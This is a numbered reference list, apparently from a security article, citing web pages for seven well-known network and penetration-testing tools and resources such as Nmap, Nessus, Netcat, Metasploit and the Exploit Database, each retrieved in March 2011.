1. Nikto2 Open Source web server scanner. Retrieved March 6, 2011 from cirt Web site: http://cirt.net/nikto2

2. Netcat cheat sheet. Retrieved March 6, 2011 from h.ackack.net Web site: http://h.ackack.net/cheat-sheets/netcat

3. Metasploit penetration framework. Retrieved March 6, 2011 from Metasploit Web site: http://www.metasploit.com/

4. Exploit Database – ultimate archive of exploits. Retrieved March 6, 2011 from exploit-db Web site: http://www.exploit-db.com/


5. The GNU Netcat Project. Retrieved March 6, 2011 from Sourceforge Web site: http://netcat.sourceforge.net/

6. Nessus. Retrieved March 6, 2011 from Nessus Web site: http://www.nessus.org/nessus/intro.php

7. Nmap. Retrieved March 6, 2011 from nmap Web site: http://nmap.org/